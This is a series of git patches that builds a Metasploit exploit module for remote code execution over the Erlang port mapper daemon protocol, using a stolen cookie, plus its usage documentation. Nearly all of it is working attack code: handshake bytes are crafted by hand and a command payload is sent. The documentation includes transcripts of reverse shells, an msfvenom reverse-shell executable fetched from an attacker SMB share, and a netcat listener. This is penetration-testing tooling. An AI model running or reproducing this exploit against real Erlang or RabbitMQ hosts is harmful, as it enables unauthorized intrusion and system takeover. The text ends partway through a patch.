From fcad3f0c8f47a79384c73e92d75a324601a30884 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sat, 8 Dec 2018 22:36:56 -0600 Subject: [PATCH 01/14] erlang cookie rce exploit module --- modules/exploits/unix/erlang_cookie_rce.rb | 118 +++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/unix/erlang_cookie_rce.rb diff --git a/modules/exploits/unix/erlang_cookie_rce.rb b/modules/exploits/unix/erlang_cookie_rce.rb new file mode 100644 index 000000000000..fb922d75d015 --- /dev/null +++ b/modules/exploits/unix/erlang_cookie_rce.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'digest' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Erlang Port Mapper Daemon Cookie RCE', + 'Description' => %q{ + The erlang port mapper daemon is used to coordinate distributed erlang instances. + Should an attacker get the authentication cookie RCE is trivial. Usually, this + cookie is named ".erlang.cookie" and varys on location. + }, + 'Author' => + [ + 'Daniel Mende', # discovery / blog post + 'Milton Valencia (wetw0rk)', # metasploit module + ], + 'References' => + [ + ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => 'false', + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse' + }, + 'Arch' => [ ARCH_CMD ], + 'Targets' => [[ 'Automatic Target', {} ]], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 5, 2017', + ) + ) + + register_options( + [ + OptString.new('COOKIE', [ true, 'Erlang cookie to login with']), + Opt::RHOST(), + Opt::RPORT(25672) + ]) + end + + def generate_challenge_digest(challenge) + challenge = challenge.unpack('H*')[0].to_i(16).to_s # chars -> 0xhexstr -> integer -> str + + hash = Digest::MD5.new + hash.update datastore['COOKIE'] + hash.update challenge + + vprint_status("MD5 digest generated: #{hash.hexdigest}") + return [hash.hexdigest].pack('H*') + end + + def exploit + begin + connect + + our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}" + + # SEND_NAME: send initial identification of who "we" are + send_name = "\x00\x15" + send_name << "\x6e" + send_name << "\x00\x05" + send_name << "\x00\x03\x49\x9c" + send_name << "#{our_node}" + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge + send_challenge_reply = "\x00\x15" + send_challenge_reply << "\x72" + # SEND: send the message to the node + send = "\x00\x00\x00" + send << [(0x6c+payload.raw.length).to_s(16)].pack('H*') + send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00\x0e" + send << "#{our_node}" + send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64" + send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e" + send << "#{our_node}" + send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04" + send << "call" + send << "\x64\x00\x02" + send << "os" + send << "\x64\x00\x03" + send << "cmd" + send << "\x6c\x00\x00\x00\x01\x6b\x00" + send << [(payload.raw.length).to_s(16)].pack('H*') + send << payload.raw + send << "\x6a\x64\x00\x04\x75\x73" + send << "\x65\x72" + + sock.put(send_name) + + # recieve servers "SEND_CHALLENGE" token (4 bytes) + print_status("Receiving server challenge") + challenge = sock.get + challenge = challenge[14,4] + + send_challenge_reply << challenge + send_challenge_reply << generate_challenge_digest(challenge) + + print_status("Sending challenge reply") + sock.put(send_challenge_reply) + sock.get + + print_status("Challenge sent, sending payload") + sock.put(send) + end + end +end From 69ed80f685a91fb14a7101d6f5868042cdfb2736 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sat, 8 Dec 2018 22:51:52 -0600 Subject: [PATCH 02/14] varys -> varies --- modules/exploits/unix/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/erlang_cookie_rce.rb b/modules/exploits/unix/erlang_cookie_rce.rb index fb922d75d015..7c995fc9daad 100644 --- a/modules/exploits/unix/erlang_cookie_rce.rb +++ b/modules/exploits/unix/erlang_cookie_rce.rb @@ -18,7 +18,7 @@ def initialize(info = {}) 'Description' => %q{ The erlang port mapper daemon is used to coordinate distributed erlang instances. Should an attacker get the authentication cookie RCE is trivial. Usually, this - cookie is named ".erlang.cookie" and varys on location. + cookie is named ".erlang.cookie" and varies on location. }, 'Author' => [ From 02f3d4688f27809e2a850d05d79170c251cf0aba Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 00:10:54 -0600 Subject: [PATCH 03/14] changes --- .../{unix => multi}/erlang_cookie_rce.rb | 103 +++++++++--------- 1 file changed, 50 insertions(+), 53 deletions(-) rename modules/exploits/{unix => multi}/erlang_cookie_rce.rb (51%) diff --git a/modules/exploits/unix/erlang_cookie_rce.rb b/modules/exploits/multi/erlang_cookie_rce.rb similarity index 51% rename from modules/exploits/unix/erlang_cookie_rce.rb rename to modules/exploits/multi/erlang_cookie_rce.rb index 7c995fc9daad..355abc7b3cf7 100644 --- a/modules/exploits/unix/erlang_cookie_rce.rb +++ b/modules/exploits/multi/erlang_cookie_rce.rb @@ -30,7 +30,7 @@ def initialize(info = {}) ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/'] ], 'License' => MSF_LICENSE, - 'Platform' => 'unix', + 'Platform' => 'multi', 'Privileged' => 'false', 'DefaultOptions' => { @@ -46,7 +46,6 @@ def initialize(info = {}) register_options( [ OptString.new('COOKIE', [ true, 'Erlang cookie to login with']), - Opt::RHOST(), Opt::RPORT(25672) ]) end @@ -63,56 +62,54 @@ def generate_challenge_digest(challenge) end def exploit - begin - connect - - our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}" - - # SEND_NAME: send initial identification of who "we" are - send_name = "\x00\x15" - send_name << "\x6e" - send_name << "\x00\x05" - send_name << "\x00\x03\x49\x9c" - send_name << "#{our_node}" - # SEND_CHALLENGE_REPLY: return generated digest and its own challenge - send_challenge_reply = "\x00\x15" - send_challenge_reply << "\x72" - # SEND: send the message to the node - send = "\x00\x00\x00" - send << [(0x6c+payload.raw.length).to_s(16)].pack('H*') - send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00\x0e" - send << "#{our_node}" - send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64" - send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e" - send << "#{our_node}" - send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04" - send << "call" - send << "\x64\x00\x02" - send << "os" - send << "\x64\x00\x03" - send << "cmd" - send << "\x6c\x00\x00\x00\x01\x6b\x00" - send << [(payload.raw.length).to_s(16)].pack('H*') - send << payload.raw - send << "\x6a\x64\x00\x04\x75\x73" - send << "\x65\x72" - - sock.put(send_name) - - # recieve servers "SEND_CHALLENGE" token (4 bytes) - print_status("Receiving server challenge") - challenge = sock.get - challenge = challenge[14,4] - - send_challenge_reply << challenge - send_challenge_reply << generate_challenge_digest(challenge) - - print_status("Sending challenge reply") - sock.put(send_challenge_reply) - sock.get - - print_status("Challenge sent, sending payload") - sock.put(send) - end + connect + + our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}" + + # SEND_NAME: send initial identification of who "we" are + send_name = "\x00\x15" + send_name << "\x6e" + send_name << "\x00\x05" + send_name << "\x00\x03\x49\x9c" + send_name << "#{our_node}" + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge + send_challenge_reply = "\x00\x15" + send_challenge_reply << "\x72" + # SEND: send the message to the node + send = "\x00\x00\x00" + send << [(0x6c+payload.raw.length).to_s(16)].pack('H*') + send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00\x0e" + send << "#{our_node}" + send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64" + send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e" + send << "#{our_node}" + send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04" + send << "call" + send << "\x64\x00\x02" + send << "os" + send << "\x64\x00\x03" + send << "cmd" + send << "\x6c\x00\x00\x00\x01\x6b\x00" + send << [(payload.raw.length).to_s(16)].pack('H*') + send << payload.raw + send << "\x6a\x64\x00\x04\x75\x73" + send << "\x65\x72" + + sock.put(send_name) + + # recieve servers "SEND_CHALLENGE" token (4 bytes) + print_status("Receiving server challenge") + challenge = sock.get + challenge = challenge[14,4] + + send_challenge_reply << challenge + send_challenge_reply << generate_challenge_digest(challenge) + + print_status("Sending challenge reply") + sock.put(send_challenge_reply) + sock.get + + print_status("Challenge sent, sending payload") + sock.put(send) end end From 39229125b748b70d6148551668371788abfe19a1 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 00:22:49 -0600 Subject: [PATCH 04/14] tweak --- modules/exploits/multi/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/erlang_cookie_rce.rb b/modules/exploits/multi/erlang_cookie_rce.rb index 355abc7b3cf7..1028e9a24397 100644 --- a/modules/exploits/multi/erlang_cookie_rce.rb +++ b/modules/exploits/multi/erlang_cookie_rce.rb @@ -30,7 +30,7 @@ def initialize(info = {}) ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/'] ], 'License' => MSF_LICENSE, - 'Platform' => 'multi', + 'Platform' => ['unix', 'windows'], 'Privileged' => 'false', 'DefaultOptions' => { From 2beddf10127e2a7ff34be15c09b76572b5d2662d Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 15:01:09 -0600 Subject: [PATCH 05/14] req changes --- .../exploit/multi/misc/erlang_cookie_rce.md | 147 ++++++++++++++++++ modules/exploits/multi/erlang_cookie_rce.rb | 30 ++-- 2 files changed, 164 insertions(+), 13 deletions(-) create mode 100644 documentation/modules/exploit/multi/misc/erlang_cookie_rce.md diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md new file mode 100644 index 000000000000..b7aeb4935d0c --- /dev/null +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -0,0 +1,147 @@ +0## Vulnerable Application + + The [Erlang Port Mapper Daemon](https://www.erlang.org/) is used to coordinate distributed erlang + instances. Should an attacker gain access to this cookie code execution is trivial. Normally this + cookie can be found in the home directory as ".erlang.cookie", however it varies system to system + as well as it's configuration. As an example on a Windows 10 instance it can be found under the + users home directory: e.g "C:\Users\\.erlang.cookie". Code execution is achieved via the + "os:cmd('cmd')." command + +## Verification Steps + + 1. Install the Erlang Port Mapper Daemon + 2. Install RabbitMQ + 3. Start `msfconsole` + 4. Do `use exploit/unix/erlang_cookie_rce` + 5. Do `set RHOST ` + 6. Do `set COOKIE ` + 7. Select appropriate payload (default=cmd/unix/reverse) + 8. Do `set LHOST ` + 9. `exploit` and verify shell is opened (varies per OS) + +## Scenarios + +### Ubuntu 16.04.5 LTS + + +``` +msf exploit(multi/erlang_cookie_rce) > options + +Module options (exploit/multi/erlang_cookie_rce): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + COOKIE EXAMPLE yes Erlang cookie to login with + RHOST A.B.C.D yes The target address + RPORT 25672 yes The target port (TCP) + + +Payload options (cmd/unix/reverse): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST W.X.Y.Z yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic Target + + +msf exploit(multi/erlang_cookie_rce) > exploit + +[*] Started reverse TCP double handler on W.X.Y.Z:4444 +[*] A.B.C.D:25672 - Receiving server challenge +[*] A.B.C.D:25672 - Sending challenge reply +[*] A.B.C.D:25672 - Challenge sent, sending payload +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo XinIWxzXWDO5x9EM; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "XinIWxzXWDO5x9EM\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 1 opened (W.X.Y.Z:4444 -> A.B.C.D:46410) at 2018-12-09 14:45:47 -0600 + +id +uid=122(rabbitmq) gid=130(rabbitmq) groups=130(rabbitmq) +``` + +### Windows 10 (Build 17134) + + +``` +msf exploit(multi/erlang_cookie_rce) > options + +Module options (exploit/multi/erlang_cookie_rce): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + COOKIE MOLKLGXHWQLTGUREBDKI yes Erlang cookie to login with + RHOST A.B.C.D yes The target address + RPORT 25672 yes The target port (TCP) + + +Payload options (cmd/windows/generic): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CMD \\W.X.Y.Z\BOB\t.exe yes The command string to execute + + +Exploit target: + + Id Name + -- ---- + 0 Automatic Target + + +msf exploit(multi/erlang_cookie_rce) > exploit + +[*] A.B.C.D:25672 - Receiving server challenge +[*] A.B.C.D:25672 - Sending challenge reply +[*] A.B.C.D:25672 - Challenge sent, sending payload +[*] Exploit completed, but no session was created. + +--- Impacket SMB Server --- +root@kali:/tmp# msfvenom -p windows/x64/shell_reverse_tcp LHOST=W.X.Y.Z LPORT=3 -f exe -o t.exe +[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload +[-] No arch selected, selecting arch: x64 from the payload +No encoder or badchars specified, outputting raw payload +Payload size: 460 bytes +Final size of exe file: 7168 bytes +Saved as: t.exe +root@kali:/tmp# impacket-smbserver BOB . +Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies + +[*] Config file parsed +[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 +[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 +[*] Config file parsed +[*] Config file parsed +[*] Config file parsed +[*] Incoming connection (A.B.C.D,50349) +[*] AUTHENTICATE_MESSAGE (\,DESKTOP-85258BS) +[*] User \DESKTOP-85258BS authenticated successfully +[*] :::00::4141414141414141 + +--- Handler --- + +root@kali:~# nc -lvp 3 +Listening on [0.0.0.0] (family 0, port 3) +Connection from A.B.C.D 50350 received! +Microsoft Windows [Version 10.0.17134.407] +(c) 2018 Microsoft Corporation. All rights reserved. + +C:\Users\667563~1\AppData\Roaming\RabbitMQ>whoami +whoami +nt authority\system + +C:\Users\667563~1\AppData\Roaming\RabbitMQ> +``` diff --git a/modules/exploits/multi/erlang_cookie_rce.rb b/modules/exploits/multi/erlang_cookie_rce.rb index 1028e9a24397..b2d3f63dde49 100644 --- a/modules/exploits/multi/erlang_cookie_rce.rb +++ b/modules/exploits/multi/erlang_cookie_rce.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'digest' - class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking @@ -30,11 +28,11 @@ def initialize(info = {}) ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/'] ], 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'windows'], + 'Platform' => ['unix', 'win'], 'Privileged' => 'false', 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/unix/reverse' + 'PAYLOAD' => 'cmd/unix/reverse', }, 'Arch' => [ ARCH_CMD ], 'Targets' => [[ 'Automatic Target', {} ]], @@ -51,7 +49,7 @@ def initialize(info = {}) end def generate_challenge_digest(challenge) - challenge = challenge.unpack('H*')[0].to_i(16).to_s # chars -> 0xhexstr -> integer -> str + challenge = challenge.unpack('H*')[0].to_i(16).to_s hash = Digest::MD5.new hash.update datastore['COOKIE'] @@ -64,10 +62,11 @@ def generate_challenge_digest(challenge) def exploit connect - our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}" + our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}" # SEND_NAME: send initial identification of who "we" are - send_name = "\x00\x15" + send_name = "\x00" + send_name << [(our_node.length+7).to_s(16)].pack('H*') send_name << "\x6e" send_name << "\x00\x05" send_name << "\x00\x03\x49\x9c" @@ -77,11 +76,13 @@ def exploit send_challenge_reply << "\x72" # SEND: send the message to the node send = "\x00\x00\x00" - send << [(0x6c+payload.raw.length).to_s(16)].pack('H*') - send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00\x0e" + send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') + send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00" + send << [(our_node.length).to_s(16)].pack('H*') send << "#{our_node}" send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64" - send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e" + send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00" + send << [(our_node.length).to_s(16)].pack('H*') send << "#{our_node}" send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04" send << "call" @@ -92,8 +93,8 @@ def exploit send << "\x6c\x00\x00\x00\x01\x6b\x00" send << [(payload.raw.length).to_s(16)].pack('H*') send << payload.raw - send << "\x6a\x64\x00\x04\x75\x73" - send << "\x65\x72" + send << "\x6a\x64\x00\x04" + send << "user" sock.put(send_name) @@ -107,7 +108,10 @@ def exploit print_status("Sending challenge reply") sock.put(send_challenge_reply) - sock.get + + if sock.get.length < 1 + fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}") + end print_status("Challenge sent, sending payload") sock.put(send) From 15aaaa4f217aa972bf3dbedf73d78bb8fbcae00d Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 15:39:27 -0600 Subject: [PATCH 06/14] removed 0 just saw... --- documentation/modules/exploit/multi/misc/erlang_cookie_rce.md | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index b7aeb4935d0c..bed73d42897e 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -1,4 +1,4 @@ -0## Vulnerable Application +## Vulnerable Application The [Erlang Port Mapper Daemon](https://www.erlang.org/) is used to coordinate distributed erlang instances. Should an attacker gain access to this cookie code execution is trivial. Normally this @@ -23,7 +23,6 @@ ### Ubuntu 16.04.5 LTS - ``` msf exploit(multi/erlang_cookie_rce) > options @@ -75,7 +74,6 @@ uid=122(rabbitmq) gid=130(rabbitmq) groups=130(rabbitmq) ### Windows 10 (Build 17134) - ``` msf exploit(multi/erlang_cookie_rce) > options From f6bfbddb8d391ffea03b1f35e04c4a7682b01840 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 15:59:58 -0600 Subject: [PATCH 07/14] twks --- .../modules/exploit/multi/misc/erlang_cookie_rce.md | 2 +- modules/exploits/multi/erlang_cookie_rce.rb | 9 ++------- 2 files changed, 3 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index bed73d42897e..635da703f089 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -15,7 +15,7 @@ 4. Do `use exploit/unix/erlang_cookie_rce` 5. Do `set RHOST ` 6. Do `set COOKIE ` - 7. Select appropriate payload (default=cmd/unix/reverse) + 7. Do set appropriate payload (Unix=cmd/unix/reverse, Windows=cmd/windows/generic) 8. Do `set LHOST ` 9. `exploit` and verify shell is opened (varies per OS) diff --git a/modules/exploits/multi/erlang_cookie_rce.rb b/modules/exploits/multi/erlang_cookie_rce.rb index b2d3f63dde49..14348155eee9 100644 --- a/modules/exploits/multi/erlang_cookie_rce.rb +++ b/modules/exploits/multi/erlang_cookie_rce.rb @@ -30,14 +30,9 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'Platform' => ['unix', 'win'], 'Privileged' => 'false', - 'DefaultOptions' => - { - 'PAYLOAD' => 'cmd/unix/reverse', - }, 'Arch' => [ ARCH_CMD ], 'Targets' => [[ 'Automatic Target', {} ]], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Oct 5, 2017', ) ) @@ -52,8 +47,8 @@ def generate_challenge_digest(challenge) challenge = challenge.unpack('H*')[0].to_i(16).to_s hash = Digest::MD5.new - hash.update datastore['COOKIE'] - hash.update challenge + hash.update(datastore['COOKIE']) + hash.update(challenge) vprint_status("MD5 digest generated: #{hash.hexdigest}") return [hash.hexdigest].pack('H*') From ee2ed4614389174710da992a844ee3898cfba96c Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 19:17:22 -0600 Subject: [PATCH 08/14] added date based on man page --- modules/exploits/multi/{ => misc}/erlang_cookie_rce.rb | 1 + 1 file changed, 1 insertion(+) rename modules/exploits/multi/{ => misc}/erlang_cookie_rce.rb (97%) diff --git a/modules/exploits/multi/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb similarity index 97% rename from modules/exploits/multi/erlang_cookie_rce.rb rename to modules/exploits/multi/misc/erlang_cookie_rce.rb index 14348155eee9..afb24f0e8e5e 100644 --- a/modules/exploits/multi/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -33,6 +33,7 @@ def initialize(info = {}) 'Arch' => [ ARCH_CMD ], 'Targets' => [[ 'Automatic Target', {} ]], 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 29, 2009', # http://erlang.org/doc/man/os.html ) ) From 565f2e3e3843eec8e05430e32598a212e2acd1e3 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Sun, 9 Dec 2018 19:23:54 -0600 Subject: [PATCH 09/14] wait wrong --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index afb24f0e8e5e..9530056e4e60 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -33,7 +33,7 @@ def initialize(info = {}) 'Arch' => [ ARCH_CMD ], 'Targets' => [[ 'Automatic Target', {} ]], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 29, 2009', # http://erlang.org/doc/man/os.html + 'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history) ) ) From 2e26ceac8f85a1333eb94804da8a22584023a4f6 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Thu, 13 Dec 2018 10:55:09 -0600 Subject: [PATCH 10/14] added comments --- .../exploit/multi/misc/erlang_cookie_rce.md | 4 +- .../exploits/multi/misc/erlang_cookie_rce.rb | 87 ++++++++++++------- 2 files changed, 60 insertions(+), 31 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index 635da703f089..e4ab90888baf 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -55,7 +55,7 @@ msf exploit(multi/erlang_cookie_rce) > exploit [*] Started reverse TCP double handler on W.X.Y.Z:4444 [*] A.B.C.D:25672 - Receiving server challenge [*] A.B.C.D:25672 - Sending challenge reply -[*] A.B.C.D:25672 - Challenge sent, sending payload +[+] A.B.C.D:25672 - Authentication successful, sending payload [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo XinIWxzXWDO5x9EM; @@ -104,7 +104,7 @@ msf exploit(multi/erlang_cookie_rce) > exploit [*] A.B.C.D:25672 - Receiving server challenge [*] A.B.C.D:25672 - Sending challenge reply -[*] A.B.C.D:25672 - Challenge sent, sending payload +[+] A.B.C.D:25672 - Authentication successful, sending payload [*] Exploit completed, but no session was created. --- Impacket SMB Server --- diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 9530056e4e60..9376aa26407f 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -61,36 +61,65 @@ def exploit our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}" # SEND_NAME: send initial identification of who "we" are - send_name = "\x00" - send_name << [(our_node.length+7).to_s(16)].pack('H*') - send_name << "\x6e" - send_name << "\x00\x05" - send_name << "\x00\x03\x49\x9c" - send_name << "#{our_node}" + send_name = "\x00" # Length: 0x0000 + send_name << [(our_node.length+7).to_s(16)].pack('H*') # + send_name << "\x6e" # Tag: n + send_name << "\x00\x05" # Version: R6 (5) + send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) + send_name << "#{our_node}" # @ + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge - send_challenge_reply = "\x00\x15" - send_challenge_reply << "\x72" + send_challenge_reply = "\x00\x15" # Length: 21 + send_challenge_reply << "\x72" # Tag: r + # SEND: send the message to the node - send = "\x00\x00\x00" - send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') - send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00" - send << [(our_node.length).to_s(16)].pack('H*') - send << "#{our_node}" - send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64" - send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00" - send << [(our_node.length).to_s(16)].pack('H*') - send << "#{our_node}" - send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04" - send << "call" - send << "\x64\x00\x02" - send << "os" - send << "\x64\x00\x03" - send << "cmd" - send << "\x6c\x00\x00\x00\x01\x6b\x00" - send << [(payload.raw.length).to_s(16)].pack('H*') - send << payload.raw - send << "\x6a\x64\x00\x04" - send << "user" + send = "\x00\x00\x00" # Length:0x00000000 + send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') # + send << "\x70" # + send << "\x83" # VERSION_MAGIC + send << "\x68" # SMALL_TUPLE_EXT (104) + send << "\x04" # Arity: 4 + send << "\x61" # SMALL_INTEGER_EXT + send << "\x06" # Int: 6 + send << "\x67" # PID_EXT (103) + send << "\x64\x00" # Node: + send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) + send << "#{our_node}" # Node + send << "\x00\x00\x00\x03" # ID + send << "\x00\x00\x00\x00" # Serial + send << "\x00" # Creation + send << "\x64" # InternalSegmentIndex + send << "\x00\x00" # Len: 0x0000 + send << "\x64" # InternalSegmentIndex + send << "\x00\x03" # Length: 3 + send << "rex" # AtomText: rex + send << "\x83\x68\x02\x67\x64\x00" # + send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) + send << "#{our_node}" # Node + send << "\x00\x00\x00\x03" # ID + send << "\x00\x00\x00\x00" # Serial + send << "\x00" # Creation + send << "\x68" # SMALL_TUPLE_EXT (104) + send << "\x05" # Arity: 5 + send << "\x64" # InternalSegmentIndex + send << "\x00\x04" # Length: 4 + send << "call" # AtomText: call + send << "\x64" # InternalSegmentIndex + send << "\x00\x02" # Length: 2 + send << "os" # AtomText: os + send << "\x64" # InternalSegmentIndex + send << "\x00\x03" # Length: 3 + send << "cmd" # AtomText: cmd + send << "\x6c" # LIST_EXT + send << "\x00\x00\x00\x01" # Length: 1 + send << "\x6b" # Elements: k + send << "\x00" # Tail + send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command) + send << payload.raw # Command + send << "\x6a" # NIL_EXT + send << "\x64" # InternalSegmentIndex + send << "\x00\x04" # Length: 4 + send << "user" # AtomText: user sock.put(send_name) @@ -109,7 +138,7 @@ def exploit fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}") end - print_status("Challenge sent, sending payload") + print_good("Authentication successful, sending payload") sock.put(send) end end From 3f1aa425b49433e43ef53a164e86a0de48fa2521 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Thu, 13 Dec 2018 11:03:41 -0600 Subject: [PATCH 11/14] msftidy....lol --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 9376aa26407f..99b71263f8cb 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -67,7 +67,7 @@ def exploit send_name << "\x00\x05" # Version: R6 (5) send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) send_name << "#{our_node}" # @ - + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge send_challenge_reply = "\x00\x15" # Length: 21 send_challenge_reply << "\x72" # Tag: r @@ -82,7 +82,7 @@ def exploit send << "\x61" # SMALL_INTEGER_EXT send << "\x06" # Int: 6 send << "\x67" # PID_EXT (103) - send << "\x64\x00" # Node: + send << "\x64\x00" # Node: send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) send << "#{our_node}" # Node send << "\x00\x00\x00\x03" # ID From 